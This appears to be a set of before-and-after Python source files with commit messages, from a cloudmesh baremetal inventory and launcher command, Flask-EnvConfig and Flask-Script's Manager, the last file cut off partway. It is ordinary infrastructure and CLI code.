query_elem = {"cm_id": cluster_id, "cm_key": "nameserver", "cm_attribute": "variable"}
full_query_elem = self.get_full_query(query_elem)
find_result = self.db_client.find(full_query_elem)
result = []
if find_result["result"]:
data = find_result["data"]
for record in data:
result.append(record["cm_value"])
return None if len(result) < 1 else " ".join(result)
def change_dict_key(self, data_dict, fields):
"""
change the key in dict from old_key to new_key.
:param dict fields: the projection from old_key to new_key. {"old_key": "new_key"}
"""
for key in fields:
if key in data_dict:
data_dict[fields[key]] = data_dict.pop(key)
def fill_dict_default_key(self, data_dict, fields):
"""
fill the dict with default key-value pair.
:param dict fields: the default key-value pair. {"key": "default"}
"""
for key in fields:
if key not in data_dict:
data_dict[key] = fields[key]
def get_host_info_cobbler(self, host_dict):
"""
convert general host info dict to the formation of cobbler host formation
"""
# section 1, general fields
general_fields = {"id": "name", "name_servers": "name-servers",}
self.change_dict_key(host_dict, general_fields)
# section 2, power fields
power_fields = {"ipaddr": "power-address",
"power_user": "power-user",
"power_pass": "power-pass",
"power_type": "power-type",
}
power_default = {"power-id": 2,
}
self.change_dict_key(host_dict["power"], power_fields)
self.fill_dict_default_key(host_dict["power"], power_default)
# section 3, interface fields
interface_fields = {"ipaddr": "ip-address",
"macaddr": "mac-address",
}
interface_default = {"netmask": "255.255.255.0",
"static": True,
}
for one_interface in host_dict["interfaces"]:
self.change_dict_key(one_interface, interface_fields)
self.fill_dict_default_key(one_interface, interface_default)
def insert_blank_baremetal_list(self):
"""insert a blank document of baremetal computers list into mongodb
ONLY called ONCE by **fab mongo.inventory**
"""
elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory",}
result = self.db_client.find_one(elem)
flag_insert = True
if result["result"] and result["data"]:
flag_insert = False
if not flag_insert:
return True
result = self.db_client.insert(elem)
return result["result"]
def enable_baremetal_computers(self, hosts):
"""add the list of *hosts* to be baremetal computers
:param list hosts: the list of hosts with the formation ["host1", "host2",]
:return: True means enabled successfully, otherwise False
"""
if hosts:
query_elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory", }
update_elem = {"$addToSet":{"data": {"$each": hosts}}}
result = self.db_client.atom_update(query_elem, update_elem)
return result["result"]
return True
def disable_baremetal_computers(self, hosts):
"""remove the list of *hosts* from baremetal computers
:param list hosts: the list of hosts with the formation ["host1", "host2",]
:return: True means disabled successfully, otherwise False
"""
if hosts:
query_elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory", }
update_elem = {"$pull":{"data": {"$in": hosts}}}
result = self.db_client.atom_update(query_elem, update_elem)
return result["result"]
return True
def get_baremetal_computers(self):
"""get the list of baremetal computers
:return: the list of hosts with the formation ["host1", "host2",] or None if failed
"""
query_elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory", }
result = self.db_client.find_one(query_elem)
if result["result"]:
return result["data"]["data"] if "data" in result["data"] else []
return None
# test
if __name__ == "__main__":
from pprint import pprint
bmc = BaremetalComputer()
"""
data = bmc.insert_mac_data_to_inventory()
print data
for host in ["???", "???", "???"]:
data = bmc.get_host_info(host)
pprint(data)
"""
#result = bmc.get_host_info("i080")
#result = bmc.insert_blank_baremetal_list()
#result = bmc.enable_baremetal_computers(["i001", "i003", "i007", "i189"])
#result = bmc.disable_baremetal_computers(["i001", "i007",])
result = bmc.get_baremetal_computers()
pprint(result)
|
# -*- coding: utf-8 -*-
"""
FLask-EnvConfig
:copyright: (c) 2014 by Lars Hansson.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import ast
from os import environ
DEFAULT_ENV_PREFIX = 'FLASK_'
class EnvConfig(object):
"""Configure Flask from environment variables."""
def __init__(self, app=None, prefix=DEFAULT_ENV_PREFIX):
self.app = app
if app is not None:
self.init_app(app, prefix)
def init_app(self, app, prefix=DEFAULT_ENV_PREFIX):
for key, value in environ.iteritems():
if key.startswith(prefix):
key = key[len(prefix):]
try:
value = ast.literal_eval(value)
except (ValueError, SyntaxError):
pass
app.config[key] = value
support Python 3
# -*- coding: utf-8 -*-
"""
FLask-EnvConfig
:copyright: (c) 2014 by Lars Hansson.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import ast
from os import environ
import sys
DEFAULT_ENV_PREFIX = 'FLASK_'
PY2 = sys.version_info[0] == 2
class EnvConfig(object):
"""Configure Flask from environment variables."""
def __init__(self, app=None, prefix=DEFAULT_ENV_PREFIX):
self.app = app
if app is not None:
self.init_app(app, prefix)
def init_app(self, app, prefix=DEFAULT_ENV_PREFIX):
for key, value in iteritems(environ):
if key.startswith(prefix):
key = key[len(prefix):]
try:
value = ast.literal_eval(value)
except (ValueError, SyntaxError):
pass
app.config[key] = value
def iteritems(d):
if PY2:
return d.iteritems()
else:
return d.items()
|
# import os
from __future__ import print_function
import sys
import traceback
from pprint import pprint
from cloudmesh_install.util import path_expand
from cloudmesh_common.logger import LOGGER
# from cloudmesh_common.tables import row_table
from cloudmesh_common.util import get_rand_string
from cloudmesh.config.ConfigDict import ConfigDict
from cloudmesh.config.cm_config import cm_config
from cloudmesh.user.cm_user import cm_user
from cloudmesh.cm_mongo import cm_mongo
from cmd3.shell import command
from cmd3.console import Console
from cloudmesh.util.shellutil import shell_commands_dict_output
from cloudmesh.util.config import ordered_dump
from cloudmesh_common.util import dict_uni_to_ascii
log = LOGGER(__file__)
class cm_shell_launcher:
"""opt_example class"""
_id = "t_stacks" # id for stack in cm_mongo
def activate_cm_shell_launcher(self):
self.register_command_topic('cloud', 'launcher')
pass
def get_cloud_name(self, cm_user_id):
"""Returns a default cloud name if exists
"""
try:
return self.cm_user.get_defaults(cm_user_id)['cloud']
except KeyError:
log.error('set a default cloud with openstack. "stack" works on'
' openstack platform only')
return None
@command
def do_launcher(self, args, arguments):
"""
Usage:
launcher start COOKBOOK
launcher stop STACK_NAME
launcher list
launcher cookbook [--column=COLUMN] [--format=FORMAT]
launcher import [FILEPATH] [--force]
launcher export FILEPATH
launcher help | -h
An orchestration tool with Chef Cookbooks
Arguments:
COOKBOOK Name of a cookbook
STACK_NAME Name of a launcher
FILEPATH Filepath
COLUMN column name to display
FORMAT display format (json, table)
help Prints this message
Options:
-v verbose mode
"""
log.info(arguments)
self.cm_mongo = cm_mongo()
self.cm_config = cm_config()
self.user = cm_user()
if arguments["help"] or arguments["-h"]:
print (self.do_launcher.__doc__)
elif arguments['cookbook']:
userid = self.cm_config.username()
launchers = self.cm_mongo.launcher_get(userid)
if launchers.count() == 0:
Console.warning("no launcher in database, please import launcher first"
"(launcher import [FILEPATH] [--force])")
return
else:
d = {}
for launcher in launchers:
d[launcher['cm_launcher']] = launcher
if "_id" in d[launcher['cm_launcher']]:
del d[launcher['cm_launcher']]['_id']
columns = None
if arguments['--column']:
if arguments['--column'] != "all":
columns = [x.strip() for x in arguments['--column'].split(',')]
else:
columns = ['name', 'description']
if arguments['--format']:
if arguments['--format'] not in ['table', 'json', 'csv']:
Console.error("please select printing format ",
"among table, json and csv")
return
else:
p_format = arguments['--format']
else:
p_format = None
shell_commands_dict_output(d,
print_format=p_format,
firstheader="launcher",
header=columns
# vertical_table=True
)
elif arguments['list']:
userid = self.cm_config.username()
self.cm_mongo.activate(userid)
self.cm_mongo.refresh(cm_user_id=userid, types=[self._id])
stacks = self.cm_mongo.stacks(cm_user_id=userid)
launchers = self.filter_launcher(
stacks,
{"search": "contain",
"key": "stack_name",
"value": "launcher"}
)
log.debug(launchers)
d = {}
for k0, v0 in launchers.iteritems():
for k1, v1 in launchers[k0].iteritems():
d[v1['id']] = v1
columns = ['stack_name', 'description', 'stack_status',
'creation_time', 'cm_cloud']
if arguments['--column'] and arguments['--column'] != "all":
columns = [x.strip() for x in arguments['--column'].split(',')]
if arguments['--format']:
if arguments['--format'] not in ['table', 'json', 'csv']:
Console.error("please select printing format among table, json and csv")
return
else:
p_format = arguments['--format']
else:
p_format = None
shell_commands_dict_output(d,
print_format=p_format,
firstheader="launcher_id",
header=columns
# vertical_table=True
)
elif arguments['start'] and arguments['COOKBOOK']:
userid = self.cm_config.username()
def_cloud = self.get_cloud_name(userid)
self.cm_mongo.activate(userid)
keyname = self.user.get_defaults(userid)['key']
cookbook = arguments['COOKBOOK']
s_name = "launcher-{0}-{1}-{2}".format(userid, cookbook, get_rand_string())
passwdHash = "123456789" # doing nothing. just for test
t_url = "https://raw.githubusercontent.com/cloudmesh/cloudmesh/dev/heat-templates/centos6/launcher/launcher.yaml"
param = {'KeyName': keyname,
'Cookbook': cookbook,
'PasswdHash': passwdHash}
log.debug(def_cloud, userid, s_name, t_url, param)
res = self.cm_mongo.stack_create(cloud=def_cloud, cm_user_id=userid,
servername=s_name,
template_url=t_url,
parameters=param)
log.debug(res)
return res
elif arguments['stop'] and arguments['STACK_NAME']:
userid = self.cm_config.username()
def_cloud = self.get_cloud_name(userid)
s_id = arguments['STACK_NAME']
self.cm_mongo.activate(userid)
res = self.cm_mongo.stack_delete(cloud=def_cloud,
cm_user_id=userid,
server=s_id)
log.debug(res)
return res
elif arguments['import']:
filepath = "~/.cloudmesh/cloudmesh_launcher.yaml"
if arguments['FILEPATH']:
filepath = arguments['FILEPATH']
try:
filename = path_expand(filepath)
fileconfig = ConfigDict(filename=filename)
except Exception, err:
Console.error(
"error while loading '{0}', please check".format(filepath))
print (traceback.format_exc())
print (sys.exc_info()[0])
return
try:
recipes_dict = fileconfig.get("cloudmesh", "launcher", "recipies")
except:
Console.error("error while loading recipies from the file")
# print recipes_dict
userid = self.cm_config.username()
launcher_names = []
launchers = self.cm_mongo.launcher_get(userid)
for launcher in launchers:
launcher_names.append(launcher['cm_launcher'].encode("ascii"))
for key in recipes_dict:
if key in launcher_names:
if arguments['--force']:
self.cm_mongo.launcher_remove(userid, key)
self.cm_mongo.launcher_import(
recipes_dict[key], key, userid)
print ("launcher '{0}' overwritten.".format(key))
else:
print ("ERROR: launcher '{0}' exists, "
"please remove it first, or use "
"'--force' when adding".format(key))
else:
self.cm_mongo.launcher_import(
recipes_dict[key], key, userid)
print ("launcher '{0}' added.".format(key))
elif arguments['export']:
userid = self.cm_config.username()
launchers = self.cm_mongo.launcher_get(userid)
if launchers.count() == 0:
Console.warning(
"no launcher in database, "
"please import launcher first"
"(launcher import [FILEPATH] [--force])")
else:
d = {}
for launcher in launchers:
key = launcher['cm_launcher']
d[key] = launcher
if "_id" in d[key]:
del d[key]['_id']
if "cm_launcher" in d[key]:
del d[key]['cm_launcher']
if "cm_kind" in d[key]:
del d[key]['cm_kind']
if "cm_user_id" in d[key]:
del d[key]['cm_user_id']
d = dict_uni_to_ascii(d)
d = {"meta": {"yaml_version": "2.1",
"kind": "launcher"},
"cloudmesh": {"launcher": {"recipies": d}}}
pprint(d)
print ("exporting to {0}...".format(arguments['FILEPATH']))
try:
filename = path_expand(arguments['FILEPATH'])
stream = file(filename, 'w')
ordered_dump(d, stream=stream)
Console.ok("done")
except Exception, err:
Console.error("failed exporting to {0}"
.format(arguments['FILEPATH']))
print (traceback.format_exc())
print (sys.exc_info()[0])
def filter_launcher(self, stacks, _filter):
"""Returns if it satisfies the condition of the filter.
Description:
This is being used to filter out other stacks not related
to launcher. Launcher should starts with 'launcher-xxx'
in its stack_name. This way, we can separate general
stacks and launcher stacks.
parameter:
stacks (dict): all stacks
_filter (dict): key, value, search
"""
new_stacks = {}
for k0, v0 in stacks.iteritems():
new_stacks[k0] = {}
for k1, v1 in stacks[k0].iteritems():
try:
value = stacks[k0][k1][_filter['key']]
if _filter['search'] == "contain":
if _filter['value'] in value:
new_stacks[k0][k1] = v1
except KeyError:
pass
return new_stacks
cookbook -> menu naming changed
# import os
from __future__ import print_function
import sys
import traceback
from pprint import pprint
from cloudmesh_install.util import path_expand
from cloudmesh_common.logger import LOGGER
# from cloudmesh_common.tables import row_table
from cloudmesh_common.util import get_rand_string
from cloudmesh.config.ConfigDict import ConfigDict
from cloudmesh.config.cm_config import cm_config
from cloudmesh.user.cm_user import cm_user
from cloudmesh.cm_mongo import cm_mongo
from cmd3.shell import command
from cmd3.console import Console
from cloudmesh.util.shellutil import shell_commands_dict_output
from cloudmesh.util.config import ordered_dump
from cloudmesh_common.util import dict_uni_to_ascii
log = LOGGER(__file__)
class cm_shell_launcher:
"""opt_example class"""
_id = "t_stacks" # id for stack in cm_mongo
def activate_cm_shell_launcher(self):
self.register_command_topic('cloud', 'launcher')
pass
def get_cloud_name(self, cm_user_id):
"""Returns a default cloud name if exists
"""
try:
return self.cm_user.get_defaults(cm_user_id)['cloud']
except KeyError:
log.error('set a default cloud with openstack. "stack" works on'
' openstack platform only')
return None
@command
def do_launcher(self, args, arguments):
"""
Usage:
launcher start MENU
launcher stop STACK_NAME
launcher list
launcher menu [--column=COLUMN] [--format=FORMAT]
launcher import [FILEPATH] [--force]
launcher export FILEPATH
launcher help | -h
An orchestration tool with Chef Cookbooks
Arguments:
MENU Name of a cookbook
STACK_NAME Name of a launcher
FILEPATH Filepath
COLUMN column name to display
FORMAT display format (json, table)
help Prints this message
Options:
-v verbose mode
"""
log.info(arguments)
self.cm_mongo = cm_mongo()
self.cm_config = cm_config()
self.user = cm_user()
if arguments["help"] or arguments["-h"]:
print (self.do_launcher.__doc__)
elif arguments['menu']:
userid = self.cm_config.username()
launchers = self.cm_mongo.launcher_get(userid)
if launchers.count() == 0:
Console.warning("no launcher in database, please import launcher first"
"(launcher import [FILEPATH] [--force])")
return
else:
d = {}
for launcher in launchers:
d[launcher['cm_launcher']] = launcher
if "_id" in d[launcher['cm_launcher']]:
del d[launcher['cm_launcher']]['_id']
columns = None
if arguments['--column']:
if arguments['--column'] != "all":
columns = [x.strip() for x in arguments['--column'].split(',')]
else:
columns = ['name', 'description']
if arguments['--format']:
if arguments['--format'] not in ['table', 'json', 'csv']:
Console.error("please select printing format ",
"among table, json and csv")
return
else:
p_format = arguments['--format']
else:
p_format = None
shell_commands_dict_output(d,
print_format=p_format,
firstheader="launcher",
header=columns
# vertical_table=True
)
elif arguments['list']:
userid = self.cm_config.username()
self.cm_mongo.activate(userid)
self.cm_mongo.refresh(cm_user_id=userid, types=[self._id])
stacks = self.cm_mongo.stacks(cm_user_id=userid)
launchers = self.filter_launcher(
stacks,
{"search": "contain",
"key": "stack_name",
"value": "launcher"}
)
log.debug(launchers)
d = {}
for k0, v0 in launchers.iteritems():
for k1, v1 in launchers[k0].iteritems():
d[v1['id']] = v1
columns = ['stack_name', 'description', 'stack_status',
'creation_time', 'cm_cloud']
if arguments['--column'] and arguments['--column'] != "all":
columns = [x.strip() for x in arguments['--column'].split(',')]
if arguments['--format']:
if arguments['--format'] not in ['table', 'json', 'csv']:
Console.error("please select printing format among table, json and csv")
return
else:
p_format = arguments['--format']
else:
p_format = None
shell_commands_dict_output(d,
print_format=p_format,
firstheader="launcher_id",
header=columns
# vertical_table=True
)
elif arguments['start'] and arguments['COOKBOOK']:
userid = self.cm_config.username()
def_cloud = self.get_cloud_name(userid)
self.cm_mongo.activate(userid)
keyname = self.user.get_defaults(userid)['key']
cookbook = arguments['MENU']
s_name = "launcher-{0}-{1}-{2}".format(userid, cookbook, get_rand_string())
passwdHash = "123456789" # doing nothing. just for test
t_url = "https://raw.githubusercontent.com/cloudmesh/cloudmesh/dev/heat-templates/centos6/launcher/launcher.yaml"
param = {'KeyName': keyname,
'Cookbook': cookbook,
'PasswdHash': passwdHash}
log.debug(def_cloud, userid, s_name, t_url, param)
res = self.cm_mongo.stack_create(cloud=def_cloud, cm_user_id=userid,
servername=s_name,
template_url=t_url,
parameters=param)
log.debug(res)
return res
elif arguments['stop'] and arguments['STACK_NAME']:
userid = self.cm_config.username()
def_cloud = self.get_cloud_name(userid)
s_id = arguments['STACK_NAME']
self.cm_mongo.activate(userid)
res = self.cm_mongo.stack_delete(cloud=def_cloud,
cm_user_id=userid,
server=s_id)
log.debug(res)
return res
elif arguments['import']:
filepath = "~/.cloudmesh/cloudmesh_launcher.yaml"
if arguments['FILEPATH']:
filepath = arguments['FILEPATH']
try:
filename = path_expand(filepath)
fileconfig = ConfigDict(filename=filename)
except Exception, err:
Console.error(
"error while loading '{0}', please check".format(filepath))
print (traceback.format_exc())
print (sys.exc_info()[0])
return
try:
recipes_dict = fileconfig.get("cloudmesh", "launcher", "recipies")
except:
Console.error("error while loading recipies from the file")
# print recipes_dict
userid = self.cm_config.username()
launcher_names = []
launchers = self.cm_mongo.launcher_get(userid)
for launcher in launchers:
launcher_names.append(launcher['cm_launcher'].encode("ascii"))
for key in recipes_dict:
if key in launcher_names:
if arguments['--force']:
self.cm_mongo.launcher_remove(userid, key)
self.cm_mongo.launcher_import(
recipes_dict[key], key, userid)
print ("launcher '{0}' overwritten.".format(key))
else:
print ("ERROR: launcher '{0}' exists, "
"please remove it first, or use "
"'--force' when adding".format(key))
else:
self.cm_mongo.launcher_import(
recipes_dict[key], key, userid)
print ("launcher '{0}' added.".format(key))
elif arguments['export']:
userid = self.cm_config.username()
launchers = self.cm_mongo.launcher_get(userid)
if launchers.count() == 0:
Console.warning(
"no launcher in database, "
"please import launcher first"
"(launcher import [FILEPATH] [--force])")
else:
d = {}
for launcher in launchers:
key = launcher['cm_launcher']
d[key] = launcher
if "_id" in d[key]:
del d[key]['_id']
if "cm_launcher" in d[key]:
del d[key]['cm_launcher']
if "cm_kind" in d[key]:
del d[key]['cm_kind']
if "cm_user_id" in d[key]:
del d[key]['cm_user_id']
d = dict_uni_to_ascii(d)
d = {"meta": {"yaml_version": "2.1",
"kind": "launcher"},
"cloudmesh": {"launcher": {"recipies": d}}}
pprint(d)
print ("exporting to {0}...".format(arguments['FILEPATH']))
try:
filename = path_expand(arguments['FILEPATH'])
stream = file(filename, 'w')
ordered_dump(d, stream=stream)
Console.ok("done")
except Exception, err:
Console.error("failed exporting to {0}"
.format(arguments['FILEPATH']))
print (traceback.format_exc())
print (sys.exc_info()[0])
def filter_launcher(self, stacks, _filter):
"""Returns if it satisfies the condition of the filter.
Description:
This is being used to filter out other stacks not related
to launcher. Launcher should starts with 'launcher-xxx'
in its stack_name. This way, we can separate general
stacks and launcher stacks.
parameter:
stacks (dict): all stacks
_filter (dict): key, value, search
"""
new_stacks = {}
for k0, v0 in stacks.iteritems():
new_stacks[k0] = {}
for k1, v1 in stacks[k0].iteritems():
try:
value = stacks[k0][k1][_filter['key']]
if _filter['search'] == "contain":
if _filter['value'] in value:
new_stacks[k0][k1] = v1
except KeyError:
pass
return new_stacks
|
# -*- coding: utf-8 -*-
import sys
import code
import getpass
import inspect
import warnings
import argparse
from flask import Flask
__all__ = ["Command", "Shell", "Server", "Manager", "Option",
"prompt", "prompt_pass", "prompt_bool", "prompt_choices"]
def prompt(name, default=None):
"""
Grab user input from command line.
:param name: prompt text
:param default: default value if no input provided.
"""
prompt = name + (default and ' [%s]' % default or '')
prompt += name.endswith('?') and ' ' or ': '
while True:
rv = raw_input(prompt)
if rv:
return rv
if default is not None:
return default
def prompt_pass(name, default=None):
"""
Grabs hidden (password) input from command line.
:param name: prompt text
:param default: default value if no input provided.
"""
prompt = name + (default and ' [%s]' % default or '')
prompt += name.endswith('?') and ' ' or ': '
while True:
rv = getpass.getpass(prompt)
if rv:
return rv
if default is not None:
return default
def prompt_bool(name, default=False, yes_choices=None, no_choices=None):
"""
Grabs user input from command line and converts to boolean
value.
:param name: prompt text
:param default: default value if no input provided.
:param yes_choices: default 'y', 'yes', '1', 'on', 'true', 't'
:param no_choices: default 'n', 'no', '0', 'off', 'false', 'f'
"""
yes_choices = yes_choices or ('y', 'yes', '1', 'on', 'true', 't')
no_choices = no_choices or ('n', 'no', '0', 'off', 'false', 'f')
while True:
rv = prompt(name + '?', default and 'Y' or 'N')
if not rv:
return default
if rv.lower() in yes_choices:
return True
elif rv.lower() in no_choices:
return False
def prompt_choices(name, choices, default=None):
"""
Grabs user input from command line from set of provided choices.
:param name: prompt text
:param choices: list or tuple of available choices
:param default: default value if no input provided.
"""
if default is None:
default = choices[0]
while True:
rv = prompt(name + '? - (%s)' % ', '.join(choices), default)
rv = rv.lower()
if not rv:
return default
if rv in choices:
if rv == 'none':
return None
else:
return rv
class Option(object):
"""
Stores positional and optional arguments for `ArgumentParser.add_argument
<http://argparse.googlecode.com/svn/trunk/doc/add_argument.html>`_.
:param name_or_flags: Either a name or a list of option strings,
e.g. foo or -f, --foo
:param action: The basic type of action to be taken when this argument
is encountered at the command-line.
:param nargs: The number of command-line arguments that should be consumed.
:param const: A constant value required by some action and nargs selections.
:param default: The value produced if the argument is absent from
the command-line.
:param type: The type to which the command-line arg should be converted.
:param choices: A container of the allowable values for the argument.
:param required: Whether or not the command-line option may be omitted
(optionals only).
:param help: A brief description of what the argument does.
:param metavar: A name for the argument in usage messages.
:param dest: The name of the attribute to be added to the object
returned by parse_args().
"""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
class Command(object):
"""
Base class for creating commands.
"""
option_list = []
@property
def description(self):
description = self.__doc__ or ''
return description.strip()
def add_option(self, option):
"""
Adds Option to option list.
"""
self.option_list.append(option)
def get_options(self):
"""
By default, returns self.option_list.Override if you
need to do instance-specific configuration.
"""
return self.option_list
def create_parser(self, prog):
parser = argparse.ArgumentParser(prog=prog,
description=self.description)
for option in self.get_options():
parser.add_argument(*option.args, **option.kwargs)
return parser
def run(self, app):
"""
Runs a command. This must be implemented by the subclass. The first
argument is always the app (Flask instance) followed by arguments
as configured by the Command options.
"""
raise NotImplementedError
def prompt(self, name, default=None):
warnings.warn_explicit(
"Command.prompt is deprecated, use prompt() function instead")
prompt(name, default)
def prompt_pass(self, name, default=None):
warnings.warn_explicit(
"Command.prompt_pass is deprecated, use prompt_pass() function instead")
prompt_pass(name, default)
def prompt_bool(self, name, default=False):
warnings.warn_explicit(
"Command.prompt_bool is deprecated, use prompt_bool() function instead")
prompt_bool(name, default)
def prompt_choices(self, name, choices, default=None):
warnings.warn_explicit(
"Command.choices is deprecated, use prompt_choices() function instead")
prompt_choices(name, choices, default)
class Shell(Command):
"""
Runs a Python shell inside Flask application context.
:param banner: banner appearing at top of shell when started
:param make_context: a callable returning a dict of variables
used in the shell namespace. The callable
takes a single argument, "app", the Flask
instance. By default returns a dict consisting
of just the app.
:param use_ipython: use IPython shell if available, ignore if not.
The IPython shell can be turned off in command
line by passing the **--no-ipython** flag.
"""
banner = ''
def __init__(self, banner=None, make_context=None, use_ipython=True):
self.banner = banner or self.banner
self.use_ipython = use_ipython
if make_context is None:
make_context = lambda app: dict(app=app)
self.make_context = make_context
def get_options(self):
return (
Option('--no-ipython',
action="store_true",
dest='no_ipython',
default=not(self.use_ipython)),)
def get_context(self, app):
"""
Returns a dict of context variables added to the shell namespace.
"""
return self.make_context(app)
def run(self, app, no_ipython):
"""
Runs the shell. Unless no_ipython is True or use_python is False
then runs IPython shell if that is installed.
"""
context = self.get_context(app)
if not no_ipython:
try:
import IPython
sh = IPython.Shell.IPShellEmbed(banner=self.banner)
sh(global_ns=dict(), local_ns=context)
return
except ImportError:
pass
code.interact(self.banner, local=context)
class Server(Command):
"""
Runs the Flask development server i.e. app.run()
:param host: server host
:param port: server port
:param use_debugger: if False, will no longer use Werkzeug debugger.
This can be overriden in the command line
by passing the **-d** flag.
:param use_reloader: if False, will no longer use auto-reloader.
This can be overriden in the command line by
passing the **-r** flag.
"""
def __init__(self, host='127.0.0.1', port=5000, use_debugger=True,
use_reloader=True):
self.port = port
self.host = host
self.use_debugger = use_debugger
self.use_reloader = use_reloader
def get_options(self):
return (
Option('-t', '--host',
dest='host',
default=self.host),
Option('-p', '--port',
dest='port',
type=int,
default=self.port),
Option('-d', '--debug',
action='store_true',
dest='use_debugger',
default=self.use_debugger),
Option('-r', '--reload',
action='store_true',
dest='use_reloader',
default=self.use_reloader))
def run(self, app, host, port, use_debugger, use_reloader):
app.run(host=host,
port=port,
debug=use_debugger,
use_debugger=use_debugger,
use_reloader=use_reloader)
class InvalidCommand(Exception):
pass
class Manager(object):
"""
Controller class for handling a set of commands.
Typical usage::
class Print(Command):
def run(self, app):
print "hello"
app = Flask(__name__)
manager = Manager(app)
manager.add_command("print", Print())
if __name__ == "__main__":
manager.run()
On command line::
python manage.py print
> hello
:param app: Flask instance or callable returning a Flask instance.
:param with_default_commands: load commands **runserver** and **shell**
by default.
"""
def __init__(self, app, with_default_commands=True):
self.app = app
self._commands = dict()
self._options = list()
if with_default_commands:
self.add_default_commands()
def add_default_commands(self):
"""
Adds the shell and runserver default commands. To override these
simply add your own equivalents using add_command or decorators.
"""
self.add_command("shell", Shell())
self.add_command("runserver", Server())
def create_app(self, **kwargs):
if isinstance(self.app, Flask):
return self.app
return self.app(**kwargs)
def create_parser(self, prog):
"""
Creates an ArgumentParser instance from options returned
by get_options(), and a subparser for the given command.
"""
parser = argparse.ArgumentParser(prog=prog)
for option in self.get_options():
parser.add_argument(*option.args, **option.kwargs)
return parser
def get_options(self):
return self._options
def add_option(self, *args, **kwargs):
"""
Adds an application-wide option. This is useful if you want to set variables
applying to the application setup, rather than individual commands.
For this to work, the manager must be initialized with a factory
function rather than an instance. Otherwise any options you set will
be ignored.
The arguments are then passed to your function, e.g.::
def create_app(config=None):
app = Flask(__name__)
if config:
app.config.from_pyfile(config)
return app
manager = Manager(create_app)
manager.add_option("-c", "--config", dest="config", required=False)
> python manage.py -c dev.cfg mycommand
Any manager options passed in the command line will not be passed to
the command.
Arguments for this function are the same as for the Option class.
"""
self._options.append(Option(*args, **kwargs))
def command(self, func):
"""
Adds a command function to the registry.
:param func: command function. Should take at least one argument, the
Flask application. Additional arguments depend on the
options.
"""
args, varargs, keywords, defaults = inspect.getargspec(func)
options = []
# first arg is always "app" : ignore
args = args[1:]
defaults = defaults or []
kwargs = dict(zip(*[reversed(l) for l in (args, defaults)]))
for arg in args:
if arg in kwargs:
default=kwargs[arg]
if isinstance(default, bool):
options.append(Option('-%s' % arg[0],
'--%s' % arg,
action="store_true",
dest=arg,
required=False,
default=default))
else:
options.append(Option('-%s' % arg[0],
'--%s' % arg,
dest=arg,
required=False,
default=default))
else:
options.append(Option(arg))
command = Command()
command.run = func
command.__doc__ = func.__doc__
command.option_list = options
self.add_command(func.__name__, command)
return func
def shell(self, func):
"""
Decorator that wraps function in shell command. This is equivalent to::
def _make_context(app):
return dict(app=app)
manager.add_command("shell", Shell(make_context=_make_context))
The decorated function should take a single "app" argument, and return
a dict.
For more sophisticated usage use the Shell class.
"""
self.add_command('shell', Shell(make_context=func))
return func
def option(self, *args, **kwargs):
"""
Decorator to add an option to a function. Automatically registers the
function - do not use together with ``@command``. You can add as many
``@option`` calls as you like, for example::
@option('-n', '--name', dest='name')
@option('-u', '--url', dest='url')
def hello(app, name, url):
print "hello", name, url
Takes the same arguments as the ``Option`` constructor.
"""
option = Option(*args, **kwargs)
def decorate(func):
name = func.__name__
if name not in self._commands:
command = Command()
command.run = func
command.__doc__ = func.__doc__
command.option_list = []
self.add_command(name, command)
self._commands[name].option_list.append(option)
return func
return decorate
def add_command(self, name, command):
"""
Adds command to registry.
:param command: Command instance
"""
self._commands[name] = command
def get_usage(self):
"""
Returns string consisting of all commands and their
descriptions.
"""
rv = []
for name, command in self._commands.iteritems():
usage = name
description = command.description
if description:
usage += ": " + description
rv.append(usage)
return "\n".join(rv)
def print_usage(self):
"""
Prints result of get_usage()
"""
print self.get_usage()
def handle(self, prog, name, args=None):
args = list(args or [])
try:
command = self._commands[name]
except KeyError:
raise InvalidCommand, "Command %s not found" % name
help_args = ('-h', '--help')
# remove -h from args if present, and add to remaining args
app_args = [a for a in args if a not in help_args]
app_parser = self.create_parser(prog)
app_namespace, remaining_args = app_parser.parse_known_args(app_args)
for arg in help_args:
if arg in args:
remaining_args.append(arg)
command_parser = command.create_parser(prog + " " + name)
command_namespace = command_parser.parse_args(remaining_args)
app = self.create_app(**app_namespace.__dict__)
with app.test_request_context():
command.run(app, **command_namespace.__dict__)
def run(self, commands=None):
"""
Prepares manager to receive command line input. Usually run
inside "if __name__ == "__main__" block in a Python script.
:param commands: optional dict of commands. Appended to any commands
added using add_command().
"""
if commands:
self._commands.update(commands)
try:
self.handle(sys.argv[0],
sys.argv[1],
sys.argv[2:])
sys.exit(0)
except IndexError:
self.print_usage()
sys.exit(0)
except InvalidCommand, e:
print e
self.print_usage()
sys.exit(1)
changed server and shell descriptions
# -*- coding: utf-8 -*-
import sys
import code
import getpass
import inspect
import warnings
import argparse
from flask import Flask
__all__ = ["Command", "Shell", "Server", "Manager", "Option",
"prompt", "prompt_pass", "prompt_bool", "prompt_choices"]
def prompt(name, default=None):
"""
Grab user input from command line.
:param name: prompt text
:param default: default value if no input provided.
"""
prompt = name + (default and ' [%s]' % default or '')
prompt += name.endswith('?') and ' ' or ': '
while True:
rv = raw_input(prompt)
if rv:
return rv
if default is not None:
return default
def prompt_pass(name, default=None):
"""
Grabs hidden (password) input from command line.
:param name: prompt text
:param default: default value if no input provided.
"""
prompt = name + (default and ' [%s]' % default or '')
prompt += name.endswith('?') and ' ' or ': '
while True:
rv = getpass.getpass(prompt)
if rv:
return rv
if default is not None:
return default
def prompt_bool(name, default=False, yes_choices=None, no_choices=None):
"""
Grabs user input from command line and converts to boolean
value.
:param name: prompt text
:param default: default value if no input provided.
:param yes_choices: default 'y', 'yes', '1', 'on', 'true', 't'
:param no_choices: default 'n', 'no', '0', 'off', 'false', 'f'
"""
yes_choices = yes_choices or ('y', 'yes', '1', 'on', 'true', 't')
no_choices = no_choices or ('n', 'no', '0', 'off', 'false', 'f')
while True:
rv = prompt(name + '?', default and 'Y' or 'N')
if not rv:
return default
if rv.lower() in yes_choices:
return True
elif rv.lower() in no_choices:
return False
def prompt_choices(name, choices, default=None):
"""
Grabs user input from command line from set of provided choices.
:param name: prompt text
:param choices: list or tuple of available choices
:param default: default value if no input provided.
"""
if default is None:
